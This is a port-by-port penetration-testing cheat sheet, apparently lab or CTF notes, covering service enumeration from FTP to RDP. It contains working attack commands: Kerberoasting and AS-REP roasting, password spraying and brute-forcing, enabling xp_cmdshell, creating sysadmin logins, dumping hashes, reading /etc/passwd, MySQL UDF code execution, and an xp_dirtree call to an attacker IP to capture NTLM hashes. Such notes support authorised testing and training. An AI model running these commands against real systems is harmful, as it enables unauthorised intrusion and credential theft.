Ports / Services
21 TCP - FTP
ftp
| Action |
Command |
| Connect to server |
ftp <ip address> |
| Upload file |
put <file> |
| Download file |
get <file> |
| Upload multiple files |
mput * |
| Download multiple files |
mget * |
| Local current directory |
lcd |
| Set binary mode |
binary |
wget
| Action |
Command |
| Recursively download FTP contents |
wget -r ftp://<user><ip address> --password=<password> |
| Mirror FTP |
wget --mirror ftp://<user>:<password>@<ip address> |
proftp
- Can copy a file between remote directories using write permissions
| Action |
Command |
| Connect to FTP server |
telnet <ip address> <port> |
| Select a file to copy |
site cpfr <remote file> |
| Select a location to copy file to |
Site cpto <remote directory to copy file to> |
22 TCP - SSH
- Bruteforce credentials using:
- Hydra
- Crowbar for private keys
- Metasploit ssh_login module
25 TCP - SMTP
- Attack paths
- Enumerate users
VRFY <username>EXPN <list>RCPT TO acceptance testing (after MAIL FROM:<>; compare 250 vs 550)- Timing differences between valid/invalid
RCPT TO
- Re-test after
STARTTLS (behavior may change)
- Open relay / mis-scoped relay (test on ports 25/587/465)
- Spoofing exposure due to weak SPF/DKIM/DMARC
- SMTP AUTH spray/brute on submission ports (587/465) if
AUTH is advertised
- NTLM relay to SMTP if
AUTH NTLM is enabled
- STARTTLS downgrade risk (opportunistic-only TLS)
SMTP commands
Miscellaneous
| Action |
Command |
| Connect to SMTP server |
telnet <ip> <port>
nc -nvC <ip> <port> |
| Verify an email address |
VRFY <username> |
| List a mailing list’s membership |
EXPN <list> |
| Keepalive / test |
NOOP |
| Reset current transaction |
RSET |
| Help |
HELP |
| Quit |
QUIT |
Send an email
| Step |
Command |
| 1 |
EHLO <client-hostname> (or HELO <client-hostname>) |
| 2 |
STARTTLS (optional; if used, run EHLO again after TLS) |
| 3 |
AUTH LOGIN (optional; server then prompts for base64 creds) |
| 4 |
MAIL FROM:<sender@example.com> |
| 5 |
RCPT TO:<recipient@example.com> (repeat per recipient) |
| 6 |
DATA |
| 7 |
. (type headers + blank line + body, then a single .) |
| 8 |
QUIT (optional) |
Minimal RCPT-based enumeration (no delivery)
EHLO <client-fqdn> - do not include angle brackets
MAIL FROM:<> - keep the angle brackets, purposely empty.
RCPT TO:<user@domain> - keep the angle brackets
EHLO can be an IP-literal if needed (e.g., EHLO [192.0.2.10]); if refused, use HELO.
- If you use STARTTLS, run EHLO again post-TLS.
- Responses: 250 = valid user, 550 = no such user.
53 TCP - DNS
nslookup
| Action |
Command |
| Interactive shell |
nslookup |
| Query A (default resolver) |
nslookup <name> |
| Query via specific server |
nslookup <name> <server> |
| MX records |
nslookup -type=mx <domain> |
| NS records |
nslookup -type=ns <domain> |
| SOA record |
nslookup -type=soa <domain> |
| TXT record |
nslookup -type=txt <name> |
| Reverse (PTR) |
nslookup <ip> |
| Zone transfer attempt |
nslookup -type=AXFR <domain> <server> |
host
| Action |
Command |
| Query A |
host <name> |
| Reverse (PTR) |
host <ip> |
| MX records |
host -t mx <domain> |
| NS records |
host -t ns <domain> |
| SOA record |
host -t soa <domain> |
| TXT record |
host -t txt <name> |
| Zone transfer (AXFR) |
host -l <domain> <server> |
dig
| Action |
Command |
| A via specific server |
dig @<server> <name> A +short |
| Reverse (PTR) |
dig -x <ip> +short |
| MX records |
dig @<server> <domain> MX +short |
| NS records |
dig @<server> <domain> NS +short |
| SOA record |
dig @<server> <domain> SOA +short |
| TXT record |
dig @<server> <name> TXT +short |
| Zone transfer (AXFR) |
dig @<server> <domain> AXFR +tcp |
| Trace delegation path |
dig +trace <name> |
| CHAOS version.bind |
dig @<server> -c CH -t TXT version.bind +short |
DNSRecon
| Action |
Command |
| Standard records |
dnsrecon -d <domain> |
| Standard against specific NS |
dnsrecon -d <domain> -n <server> -t std |
| Zone transfer attempt |
dnsrecon -d <domain> -t axfr -n <server> |
| Subdomain brute force |
dnsrecon -d <domain> -D <wordlist> -t brt |
| Reverse sweep |
dnsrecon -r <cidr> -n <server> |
69 UDP - TFTP
79 TCP - Finger
$ nc -nv 192.168.108.140 79 130 ⨯
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Connected to 192.168.108.140:79.
charlotte
Login: charlotte Name: Charlotte
[No profile information]
80 TCP - HTTP
- Cleartext / unencrypted web service
88 TCP - Kerberos
Attack paths
- Username enumeration with kerbrute
kerbrute userenum -d <domain> <userlist>
- AS-REP Roasting (no pre-auth)
impacket-GetNPUsers -dc-ip <dc_ip> <domain>/ -no-pass -usersfile <users.txt> -outputfile <hashes.txt>
- Kerberoasting (retrieve all roastable users + hashes)
impacket-GetUserSPNs -dc-ip <dc_ip> <domain>/<user>:'<pass>' -request -outputfile <hashes.txt>
110 TCP - POP3
- Post Office Protocol
- Receives emails.
Commands
| Action |
Command |
| Connect to server |
nc -nv <ip address> <port>
nc -nvC <ip address> <port> |
| Pick username to login with |
USER <username> |
| Enter password |
PASS <password> |
| List emails |
LIST |
| Read email |
RETR <email # from list> |
111 TCP – rpcbind / NFS
- RPC portmapper. Maps RPC program numbers to the TCP/UDP ports those services use (e.g., NFS, mountd, nlockmgr, statd, rquotad). If 111 is open, check for NFS (2049) and related RPC services. Note: NFSv3 typically uses rpcbind; NFSv4 can run on 2049 alone.
What to look for (findings)
- World-readable/writable exports (e.g.,
*(rw) or wide subnets).
no_root_squash (client root = server root on export).- Sensitive paths exported (home dirs, backups, app secrets).
- UID/GID-based access: to read as a specific UID on a mounted share, run commands as that UID (e.g.,
sudo -u '#1001' ls /mnt/nfs/...).
- Kerberized NFS required? (e.g.,
sec=krb5*) — you won’t mount without proper creds.
nmap
nmap -sV -sU -p111,2049 --script "rpcinfo,nfs-*" <ip>
rpcinfo
| Action |
Command |
| List registered RPC programs and ports |
rpcinfo -p <ip> |
| Summary by transport (tcp/udp) |
rpcinfo -s <ip> |
| Query a specific program/version/transport |
rpcinfo -T tcp -u <ip> <prog> <vers> |
showmount
| Action |
Command |
| List exports |
showmount -e <ip> |
| List clients using exports |
showmount -a <ip> |
mount / umount
| Action |
Command |
| Mount NFSv3 export |
sudo mount -t nfs -o ro,vers=3 <ip>:/<export> /mnt/nfs |
| Mount NFSv4 root |
sudo mount -t nfs4 -o ro <ip>:/ /mnt/nfs |
| Unmount |
sudo umount /mnt/nfs |
113 TCP – ident
- Legacy Identification Protocol (RFC 1413): maps a TCP connection to the local username on the target. Often disabled/firewalled; useless behind NAT.
nmap
| Action |
Command |
| Identify ident service |
nmap -p113 -sV <host> |
| Enumerate owners of listening services via ident |
nmap -p113 --script=auth-owners <host> |
| Try ident against all open TCP ports (slower) |
nmap -sT --script=auth-owners -p- <host> |
- Manual probe (requires a live TCP connection to the target port): connect to some service on the host, then to port 113 and send
<server-port> , <your-src-port>.
119 TCP - NNTP
- Network News Transfer Protocol
Commands
| Action |
Command |
| Connect to server |
nc -nv <ip> <port> |
| List available articles to read |
LIST
LIST
215 list of newsgroups follows
org.apache.avalon.dev 0 0 y
org.apache.avalon.user 0 0 y
The 0 in each column means the first and last article for each newgroup is 0. This means there are no article available to read. |
135 TCP - MSRPC
impacket-rpcdump
- Query the Endpoint Mapper to list RPC endpoints, interfaces (UUIDs), and their dynamic ports.
| Action |
Command |
| Enumerate RPC endpoints (unauth) |
impacket-rpcdump <target> |
| Enumerate with credentials |
impacket-rpcdump <domain>/<user>:<pass>@<target> |
impacket-rpcmap
- Query the RPC management interface to list bound DCE/RPC interfaces on a given transport/port.
| Action |
Command |
| List interfaces via EPM on TCP/135 |
impacket-rpcmap 'ncacn_ip_tcp:<ip>' |
| List interfaces on a specific RPC port |
impacket-rpcmap 'ncacn_ip_tcp:<ip>[1025]' |
| List via SMB named pipe (EPM) |
impacket-rpcmap 'ncacn_np:<ip>[\\pipe\\epmapper]' |
Nmap – msrpc-enum (NSE)
- Nmap script that queries the MS-RPC endpoint mapper and summarizes mapped services.
| Action |
Command |
| Enumerate mapped RPC services |
nmap -p135 --script msrpc-enum <target> |
| Same, with SMB auth (if supported) |
nmap -p135 --script msrpc-enum --script-args smbusername=<user>,smbpassword=<pass> <target> |
137/UDP – NetBIOS Name Service (NBNS)
- Legacy name resolution and Node Status.
- Works only if NetBIOS over TCP/IP is enabled and UDP/137 is reachable.
nbtscan
| Action |
Command |
| Enumerate NetBIOS names |
sudo nbtscan -r <cidr> |
139/TCP – NetBIOS Session Service
- Legacy transport for SMB1 (NT1).
- Modern SMB (SMB2/3) uses 445 and does not require NetBIOS.
- Enumeration on 139 works only if SMB1 is enabled on the target.
- Only useful if 445 is unavailable or the host is SMB1-only.
- Test SMB1 on 139:
smbclient -L <ip> -p 139 -m NT1
- Null session via RPC:
rpcclient -U '' -N -p 139 <ip>
- See SMB & RPC Enumeration
143 TCP - IMAP
Commands
| Action |
Command |
| Connect to service (cleartext) |
nc -nv <ip> 143 |
| Connect to service (TLS) |
openssl s_client -crlf -quiet -starttls imap -connect <host>:143 |
| Login |
LOGIN <username> <password> |
| Login (quoted values) |
LOGIN "<username>" "<password>" |
| List all folders/mailboxes |
A1 LIST * |
| List INBOX children |
A1 LIST INBOX * |
| List “Archive” children |
A1 LIST "Archive" * |
| Create folder/mailbox |
A1 CREATE "<name>" |
| Delete folder/mailbox |
A1 DELETE <name> |
| Rename folder/mailbox |
A1 RENAME <old> <new> |
| List subscribed folders |
A1 LSUB "" * |
| Mailbox status |
A1 STATUS INBOX (MESSAGES UNSEEN RECENT) |
| Select mailbox |
A1 SELECT INBOX |
| List messages (flags) |
A1 FETCH 1:* (FLAGS) |
| List messages by UID (flags) |
A1 UID FETCH 1:* (FLAGS) |
| Retrieve message body (text) |
A1 FETCH 2 BODY[TEXT] |
| Retrieve message (all) |
A1 FETCH 2 ALL |
| Retrieve by UID (peek) |
A1 UID FETCH 102 (UID RFC822.SIZE BODY.PEEK[]) |
| Close mailbox |
A1 CLOSE |
| Logout |
A1 LOGOUT |
161 UDP - SNMP
- SNMP: protocol for managing/monitoring network devices (typically UDP/161 for queries, UDP/162 for traps).
- MIB (Management Information Base): hierarchical definitions (OIDs) of manageable data; devices expose values for those objects.
- Security: SNMPv1/v2c send community strings and data in cleartext (no auth/integrity/encryption) → sniffing, spoofing, replay possible; ACLs based on source IP can be bypassed with spoofing. SNMPv3 provides authentication and encryption (auth/priv) and timeliness checks.
- Defaults: “public” (RO) and “private” (RW) community strings are historically common and still encountered on misconfigured gear
MIB Objects / OIDs:
| MIB Object |
OID |
| TCP Local Ports |
1.3.6.1.2.1.6.13.1.3 |
| User Accounts |
1.3.6.1.4.1.77.1.2.25 |
| Software Name |
1.3.6.1.2.1.25.6.3.1.2 |
| Storage Units |
1.3.6.1.2.1.25.2.3.1.4 |
| Processes Path |
1.3.6.1.2.1.25.4.2.1.4 |
| Running Programs |
1.3.6.1.2.1.25.4.2.1.2 |
| System Processes |
1.3.6.1.2.1.25.1.6.0 |
onesixtyone
- SNMP scanner / community string brute force
| Action |
Command |
| Scan with community wordlist |
onesixtyone -c <communities.txt> <cidr-or-host> |
| Scan host list |
onesixtyone -c <communities.txt> -i <hosts.txt> |
snmpwalk
- Probe and query SNMP values
snmpget
| Action |
Command |
| Read single OID (v2c) |
snmpget -v2c -c <community> <ip> <OID> |
| Action |
Command |
| Walk entire tree (v1) |
snmpwalk -v1 -c <community> <ip> . |
| Walk entire tree (v2c) |
snmpwalk -v2c -c <community> <ip> . |
| Walk specific OID (v2c) |
snmpwalk -v2c -c <community> <ip> <OID> |
| Walk (v3, authPriv) |
snmpwalk -v3 -l authPriv -u <user> -a SHA -A <authpass> -x AES -X <privpass> <ip> . |
snmpbulkwalk
| Action |
Command |
| Bulk walk (v2c) |
snmpbulkwalk -v2c -c <community> <ip> . |
| Bulk walk (v3, authPriv) |
snmpbulkwalk -v3 -l authPriv -u <user> -a SHA -A <authpass> -x AES -X <privpass> <ip> . |
389 TCP - LDAP
- Plaintext LDAP service
- Retrieve global catalog information from a Domain Controller (DC).
ldapsearch
| Action |
Command |
| Basic search (anonymous) |
ldapsearch -H ldap://<ip> -x |
| Authenticate as user (simple bind) |
ldapsearch -H ldap://<ip> -x -D '<user>@<domain>' -w '<password>' -b 'DC=<x>,DC=<y>' |
| Retrieve naming contexts |
ldapsearch -H ldap://<ip> -x -s base -b '' namingcontexts |
| Dump a naming context |
ldapsearch -H ldap://<ip> -x -b 'DC=<x>,DC=<y>' '(objectClass=*)' |
| Query with filter (template) |
ldapsearch -H ldap://<ip> -x -b 'DC=<x>,DC=<y>' '<LDAP filter>' |
| All people (common attrs) |
ldapsearch -H ldap://<ip> -x -b 'DC=<x>,DC=<y>' '(objectClass=person)' sAMAccountName memberOf |
| Single user by sAMAccountName |
ldapsearch -H ldap://<ip> -x -b 'DC=<x>,DC=<y>' '(&(objectClass=user)(sAMAccountName=<user>))' sAMAccountName memberOf pwdLastSet |
| Domain Admins members |
ldapsearch -H ldap://<ip> -x -b 'DC=htb,DC=local' '(&(objectClass=user)(memberOf=CN=Domain Admins,CN=Users,DC=htb,DC=local))' sAMAccountName |
| (Alt) Direct LDAPS |
ldapsearch -H ldaps://<ip> -x -D '<user>@<domain>' -w '<password>' -b 'DC=<x>,DC=<y>' |
| Search for interesting information |
awk '{print $1}' <ldap_dump.ldif | sort | uniq -c | sort -nr |
- If
ldap_bind: Strong(er) authentication required (8)
| Action |
Command |
| Fetch server certificate |
echo -n | openssl s_client -connect <dc_fqdn>:636 | sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p' > ldapserver.pem |
| Trust cert for ldap-tools |
echo 'TLS_CACERT <path>/ldapserver.pem' | sudo tee -a /etc/ldap/ldap.conf |
| Re-run with STARTTLS |
ldapsearch -H ldap://<ip> -x -Z -D '<user>@<domain>' -w '<password>' -b 'DC=<x>,DC=<y>' |
nxc
- Fast AD LDAP enumeration (users/groups/computers, policy, roastable accounts). Target a DC for best results.
| Action |
Command |
| Anonymous bind check (user enum) |
nxc ldap <dc_ip> -u '' -p '' --users |
| Enumerate users |
nxc ldap <dc_ip> -u <user> -p '<pass>' -d <domain> --users |
| Enumerate groups |
nxc ldap <dc_ip> -u <user> -p '<pass>' -d <domain> --groups |
| Enumerate computers |
nxc ldap <dc_ip> -u <user> -p '<pass>' -d <domain> --computers |
| Password policy |
nxc ldap <dc_ip> -u <user> -p '<pass>' -d <domain> --password-policy |
| List SPNs |
nxc ldap <dc_ip> -u <user> -p '<pass>' -d <domain> --spns |
| Kerberoast (dump hashes) |
nxc ldap <dc_ip> -u <user> -p '<pass>' -d <domain> --kerberoast > kerberoast.txt |
| AS-REP roast (no-preauth users) |
nxc ldap <dc_ip> -u <user> -p '<pass>' -d <domain> --asreproast > asrep.txt |
Notes: Works against Windows DCs and Samba AD DCs; may work against domain-joined members but is policy-dependent. Use valid creds; anonymous often fails in modern domains.
443 TCP - HTTPS
sslscan
- Quick cipher/protocol/certificate survey.
| Action |
Command |
| Quick scan |
sslscan <host>:443 |
| Show only accepted suites |
sslscan --no-failed <host>:443 |
| Save XML report |
sslscan --xml=sslscan.xml <host>:443 |
testssl.sh
- Deeper checks (protocols, ciphers, vulns), good for internal hosts.
| Action |
Command |
| Quick scan |
testssl <host>:443 |
| Faster overview |
testssl --fast <host>:443 |
| Save JSON report |
testssl --jsonfile out.json <host>:443 |
SSL Labs
- External grading (internet-reachable hosts only). Use web UI or CLI.
| Action |
Command |
| Check using website |
https://www.ssllabs.com/ssltest/analyze.html?d=<host> |
| Check using CLI tool |
ssllabs-scan --usecache --quiet <host> |
445 TCP – SMB
Enumerate Samba Version
| Method |
Steps |
| Wireshark |
Log in anonymously: smbclient -L \\<ip address>
Search for packet with "Session Setup Andx Responses" in the Info field. |
| ngrep & smbclient |
Terminal 1: ngrep -i -d tap0 's.?a.?m.?b.?a.*[[:digit:]]' port 139
Terminal 2: echo exit | smbclient -L <ip address> |
464 TCP & UDP - kpasswd5
- Kerberos v5 password change/reset service on AD domain controllers (TCP/UDP 464). Implements RFC 3244 “Change/Set Password” via the
kadmin/changepw service, allowing users to change their own (including expired) passwords and admins to reset others, with domain policy enforcement. Typically invoked by kpasswd or automatically during kinit when a change is required.
500 UDP – ISAKMP / IKE
- IKE (Internet Key Exchange) negotiates IPsec Security Associations (SAs) and keys within the ISAKMP framework on UDP 500 (and UDP 4500 for NAT-Traversal).
- IPsec data planes:
- AH (integrity, origin, anti-replay)
- ESP (adds confidentiality).
- Modes:
- Transport (encrypts payload)
- Tunnel (encapsulates whole IP packet).
- Versions:
- IKEv1 (Main/Aggressive)
- IKEv2 (simplified handshake, better NAT/mobility).
- Auth typically via PSK or certificates.
ike-scan
| Action |
Command |
| Probe IKE (v1, Main Mode) |
ike-scan -M <ip> |
| Probe IKE (v1, Aggressive Mode) |
ike-scan -A <ip> |
| Probe IKEv2 |
ike-scan --ikev2 <ip> |
| Show transforms/auth methods (verbose) |
ike-scan -M -v <ip> |
| Capture Aggressive Mode for PSK cracking |
ike-scan -A --pskcrack=ike.txt <ip> |
| Crack PSK offline (dictionary) |
psk-crack --dictionary <wordlist> ike.txt |
636 TCP - LDAPS
873 TCP - rsync
Commands
| Action |
Command |
| Enumerate shares (daemon) |
rsync <ip>:: |
| Enumerate shares (alt URL) |
rsync rsync://<ip>/ |
| List files in a share |
rsync <ip>::<share> |
| Download remote file (daemon) |
rsync rsync://<ip>/<share>/<remote_file> <local_dir>/ |
| Download remote directory (daemon) |
rsync -av rsync://<ip>/<share>/<remote_dir>/ <local_dir>/ |
| Download with custom port/user (daemon) |
rsync -av rsync://<user>@<ip>:<port>/<share>/ <local_dir>/ |
| Upload local file (daemon) |
rsync <local_file> rsync://<user>@<ip>/<share>/<remote_dir>/ |
| Upload local directory (daemon) |
rsync -av <local_dir>/ rsync://<user>@<ip>/<share>/<remote_dir>/ |
| Upload local .ssh directory (example) |
rsync -av ./.ssh/ rsync://<ip>/<share>/ |
| Over SSH on non-22 port |
rsync -a -e "ssh -p <port>" <local_dir>/ <user>@<ip>:<remote_dir>/ |
1433 TCP – Microsoft SQL
- Microsoft SQL Server default service (SQL and Windows authentication). Good resource: http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
Commands
| Action |
Command |
| Run shell command |
EXEC xp_cmdshell '<command>'; |
| Enable xp_cmdshell |
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE; |
| View databases |
SELECT name FROM master.dbo.sysdatabases; |
| Select/use a database |
USE <db>; |
| Get table names |
SELECT * FROM <db>.INFORMATION_SCHEMA.TABLES;
SELECT name FROM sysobjects WHERE xtype = 'U'; |
| List linked servers |
EXEC sp_linkedservers;
SELECT * FROM sys.servers; |
| List users |
SELECT sp.name AS login, sp.type_desc AS login_type, sl.password_hash, sp.create_date, sp.modify_date, CASE WHEN sp.is_disabled = 1 THEN 'Disabled' ELSE 'Enabled' END AS status FROM sys.server_principals sp LEFT JOIN sys.sql_logins sl ON sp.principal_id = sl.principal_id WHERE sp.type NOT IN ('G','R') ORDER BY sp.name; |
| Create user with sysadmin privs |
CREATE LOGIN <username> WITH PASSWORD = '<password>';
EXEC sp_addsrvrolemember '<username>', 'sysadmin'; |
| View password hashes |
SELECT name, password_hash FROM master.sys.sql_logins; |
| View permissions |
SELECT * FROM fn_my_permissions(NULL, 'SERVER'); |
nxc
| Action |
Command |
| Spray passwords (SQL auth) |
nxc mssql <target_or_cidr> -u <user_or_list> -p <pass_or_list> |
| Windows auth login |
nxc mssql <ip> -d <domain> -u <user> -p '<pass>' |
| Windows auth with NTLM hash |
nxc mssql <ip> -d <domain> -u <user> -H <NTHASH> |
| Run OS command via xp_cmdshell |
nxc mssql <ip> -u <user> -p '<pass>' -x "whoami" |
| Run an ad-hoc SQL query |
nxc mssql <ip> -u <user> -p '<pass>' -q "SELECT @@version" |
| Check if xp_cmdshell is enabled |
nxc mssql <ip> -u <user> -p '<pass>' -q "SELECT CAST(value_in_use AS INT) FROM sys.configurations WHERE name='xp_cmdshell'" |
| Enable xp_cmdshell |
nxc mssql <ip> -u <user> -p '<pass>' -q "EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;" |
| Trigger SMB auth (capture NetNTLMv2) |
nxc mssql <ip> -u <user> -p '<pass>' -q "EXEC master..xp_dirtree '\\\\<attacker_ip>\\<share>'" |
| Specify non-default port |
nxc mssql <ip> --port <port> -u <user> -p '<pass>' |
impacket-mssqlclient
| Action |
Command |
| Login (SQL auth) |
mssqlclient <user>:<password>@<ip> |
| Login (Windows auth) |
mssqlclient <domain>/<user>:<password>@<ip> -windows-auth |
| Enable xp_cmdshell (helper) |
enable_xp_cmdshell |
| Run shell command (helper) |
xp_cmdshell <command> |
| Enable xp_cmdshell (T-SQL one-liner) |
EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; |
| Run shell command (T-SQL) |
EXEC xp_cmdshell '<command>'; |
Attack Path
- Capture sql service account SMB authentication
- Start responder on tun0
- Authenticate to responder and capture net ntlm hash
EXEC master.dbo.xp_dirtree '\\<attacker_ip>\\<share>';
- Crack captured NetNTLMv2 hash
hashcat -m 5600 <hash_file> <wordlist>
1521 TCP – Oracle TNS Listener
- Oracle Transparent Network Substrate (TNS) listener for Oracle Database. Handles client connection negotiation and service/SID routing; common target for SID discovery and auth brute force.
Commands
| Action |
Command |
| View privileges |
SELECT * FROM session_privs;
SELECT * FROM user_role_privs; |
| Read file (UTL_FILE) |
See snippet below |
| Write file (UTL_FILE) |
See snippet below |
| Run last PL/SQL block |
/ |
| Enable output |
SET SERVEROUTPUT ON |
Read a File
declare
f utl_file.file_type;
s varchar(400);
begin
f := utl_file.fopen('/inetpub/wwwroot', 'iisstart.htm', 'R');
utl_file.get_line(f,s);
utl_file.fclose(f);
dbms_output.put_line(s);
end;
Write a File
declare
f utl_file.file_type;
s varchar(5000) := '<insert text to write>';
begin
f := utl_file.fopen('/inetpub/wwwroot', '<file to write>', 'W');
utl_file.put_line(f,s);
utl_file.fclose(f);
end;
- Requires
sqlplus installed and reachable in $PATH.
| Action |
Command |
| Enumerate SIDs |
odat sidguess -s <ip> -p <port> |
| Brute-force credentials |
odat passwordguesser -s <ip> -d <service> -U <user_or_list> -P <pass_or_list> |
| All-in-one checks (authenticated) |
odat all -s <ip> -d <service> -U <user> -P <pass> |
| Authenticate as SYSDBA (flag) |
--sysdba |
| Upload file via DBMS_ADVISOR |
odat dbmsadvisor -s <ip> -d <service> -U <user> -P <pass> --sysdba --putFile C:\\inetpub\\wwwroot <remote_file> <local_file> |
| Upload file via DBMS_XSLPROCESSOR |
odat dbmsxslprocessor -s <ip> -d <service> -U <user> -P <pass> --sysdba --putFile C:\\inetpub\\wwwroot <remote_file> <local_file> |
| Action |
Command |
| SID brute |
msfconsole -q -x "use auxiliary/scanner/oracle/sid_brute; set RHOSTS <ip>; set RPORT 1521; run; exit" |
| Login brute |
msfconsole -q -x "use auxiliary/scanner/oracle/oracle_login; set RHOSTS <ip>; set RPORT 1521; set SID <sid>; run; exit" |
sqlplus
| Action |
Command |
| Login |
sqlplus64 <user>/<password>@<ip>:<port>/<service> |
| Login as SYSDBA |
sqlplus64 <user>/<password>@<ip>:<port>/<service> as sysdba |
Resources:
- Oracle DB exploit guide - blackhat.com/presentations/bh-usa-09/GATES/BHUSA09-Gates-OracleMetasploit-SLIDES.pdf
- Metasploit for Oracle - blog.zsec.uk/msforacle/
2049 TCP / mountd (NFS)
- NFS server daemon (
nfsd) for Unix/Linux file sharing. NFSv4 typically uses only 2049; NFSv3 also relies on additional RPC services (e.g., mountd, lock/quotas) discovered via rpcbind on 111.
showmount
| Action |
Command |
| Show exported paths |
showmount -e <ip> |
| Show clients using exports |
showmount -a <ip> |
mount
| Action |
Command |
| Create local mount point |
sudo mkdir -p /mnt/<dir> |
| Mount NFSv3 export |
sudo mount -t nfs <ip>:<export> /mnt/<dir> |
| Mount NFSv4 export |
sudo mount -t nfs4 <ip>:/<export> /mnt/<dir> |
| Unmount (forced/lazy) |
sudo umount -lf /mnt/<dir> |
nmap (NFS)
| Action |
Command |
| Enumerate exports via NSE |
nmap -p 111,2049 --script nfs-showmount <ip> |
| List files on export |
nmap -p 2049 --script nfs-ls --script-args nfs-ls.root=/,nfs.version=3 <ip> |
| Get filesystem stats |
nmap -p 2049 --script nfs-statfs <ip> |
3000 TCP – Express.js / Node (HTTP)
- Common development HTTP port for Node.js apps (Express, Next.js, React dev server).
- 9229 TCP – Node.js Inspector (remote debugging)
3268 TCP - LDAP
- LDAP (Global Catalog): forest-wide, read-only search endpoint on GC servers; returns only attributes in the Partial Attribute Set. Use 389/636 on a domain DC for full attributes or modifications. LDAPS to GC: 3269/TCP.
3269 TCP - LDAPS
- orest-wide LDAP over SSL/TLS to GC servers. Supports searches without referrals but returns only attributes in the Partial Attribute Set. For full attributes or modifications, query a domain DC on 636 (LDAPS) or 389 (LDAP).
3306 TCP – MySQL
- MySQL server default TCP port (SQL protocol over TCP).
Attack Paths
RCE via UDF upload
- RCE via UDF upload: Place a malicious shared library in
plugin_dir and CREATE FUNCTION ... SONAME ...; invoking the UDF can execute OS commands.
- Requirements: Ability to write to
plugin_dir (directly or via SELECT ... INTO DUMPFILE) and privilege to create UDFs (CREATE FUNCTION).
- Notes: Library must match server OS/architecture;
secure_file_priv may restrict file writes; UDFs persist until DROP FUNCTION.
- Mitigations: Lock down
plugin_dir, restrict CREATE FUNCTION, set secure_file_priv, avoid running mysqld as root.
| Action |
Command |
| Show plugin directory |
SHOW VARIABLES LIKE 'plugin_dir'; |
| Verify privileges |
SHOW GRANTS; |
| List installed UDFs (legacy) |
SELECT * FROM mysql.func; |
| Create UDF from library |
CREATE FUNCTION <udf_name> RETURNS INTEGER SONAME '<library.so|dll>'; |
| Use UDF (example) |
SELECT <udf_name>('<arg>'); |
| Drop UDF |
DROP FUNCTION <udf_name>; |
Commands
| Action |
Command |
| Show variables |
SHOW VARIABLES; |
| Show user privileges |
SHOW GRANTS; |
| Show individual variable |
SELECT @@<variable>; |
| Show plugins directory |
SHOW VARIABLES LIKE '%plugin_dir%'; |
| Show databases |
SHOW DATABASES; |
| Select/use a database |
USE <database>; |
| Show server version |
SELECT @@version; |
| Show current user |
SELECT USER(); |
| List tables in a DB |
SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='<db>'; |
| List columns for a table |
SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='TableName'; |
| Select username and password columns |
SELECT username, password FROM TableName; |
| Show all columns/records in users |
SELECT * FROM users; |
| Show username where id=1 |
SELECT username FROM users WHERE id=1; |
| Load data from local file into table |
LOAD DATA LOCAL INFILE '/path/file.csv' INTO TABLE <table> FIELDS TERMINATED BY ',' LINES TERMINATED BY '\n'; |
| Change cell contents |
UPDATE <Table> SET <Column>='<Value>' WHERE <Column>='<Value>'; |
| Create database |
CREATE DATABASE <name>; |
| Insert row into table |
INSERT INTO <table>(<col1>,<col2>) VALUES ('<val1>','<val2>'); |
| Create user |
CREATE USER '<username>'@'<host>' IDENTIFIED BY '<password>'; |
| Grant all permissions to user |
GRANT ALL ON <database>.* TO '<user>'@'<host>'; |
| Limit results |
SELECT * FROM <table> LIMIT <number>; |
| Set binary variable |
SET @<var> = 0x<hex>; |
| Output variable to server file |
SELECT @<var> INTO DUMPFILE '/path/something.bin'; |
| Info about tables/databases |
SELECT * FROM INFORMATION_SCHEMA.TABLES; |
| Check column collation |
SELECT COLLATION_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='<table>' AND COLUMN_NAME='<column>'; |
| Select with explicit collation |
SELECT <column> COLLATE <collation> FROM <table>; |
mysql
| Action |
Command |
| Connect (TCP) |
mysql --host=<ip> --port=3306 --user=<user> -p<password> |
| Connect and run one query |
mysql -h <ip> -P 3306 -u <user> -p<password> -e "SELECT VERSION();" |
| List databases |
mysql -h <ip> -P 3306 -u <user> -p<password> -e "SHOW DATABASES;" |
| List tables in a DB |
mysql -h <ip> -P 3306 -u <user> -p<password> -e "USE <db>; SHOW TABLES;" |
| Current user |
mysql -h <ip> -P 3306 -u <user> -p<password> -e "SELECT USER();" |
| Check secure_file_priv |
mysql -h <ip> -P 3306 -u <user> -p<password> -e "SHOW VARIABLES LIKE 'secure_file_priv';" |
| Read server file (LOAD_FILE) |
mysql -h <ip> -P 3306 -u <user> -p<password> -e "SELECT LOAD_FILE('/etc/passwd');" |
| Enable LOCAL INFILE (client) |
mysql --local-infile=1 -h <ip> -P 3306 -u <user> -p<password> |
| Import CSV via LOCAL INFILE |
mysql --local-infile=1 -h <ip> -P 3306 -u <user> -p<password> -e "LOAD DATA LOCAL INFILE 'data.csv' INTO TABLE <db>.<table> FIELDS TERMINATED BY ',' ENCLOSED BY '\"' LINES TERMINATED BY '\n';" |
mysqldump
| Action |
Command |
| Dump one database |
mysqldump -h <ip> -P 3306 -u <user> -p<password> <db> > dump.sql |
| Dump all databases |
mysqldump -h <ip> -P 3306 -u <user> -p<password> --all-databases > all.sql |
nmap (MySQL NSE)
| Action |
Command |
| Fingerprint and basic enum |
nmap -sV -p 3306 --script mysql-enum <ip> |
| Enumerate users (needs creds) |
nmap -p 3306 --script mysql-users --script-args mysqluser=<user>,mysqlpass=<pass> <ip> |
| Audit with policy file |
nmap -p 3306 --script mysql-audit --script-args mysql-audit.username=<user>,mysql-audit.password=<pass>,mysql-audit.filename=/path/policy.nse <ip> |
Resources
3389 TCP – RDP
- Windows Remote Desktop Protocol. Prefer xfreerdp (actively maintained; supports NLA/TLS, clipboard/drive redirection). rdesktop is legacy and may fail against modern NLA setups.
nxc
- Credential validation against RDP/NLA without opening a GUI session (use
xfreerdp for interactive access).
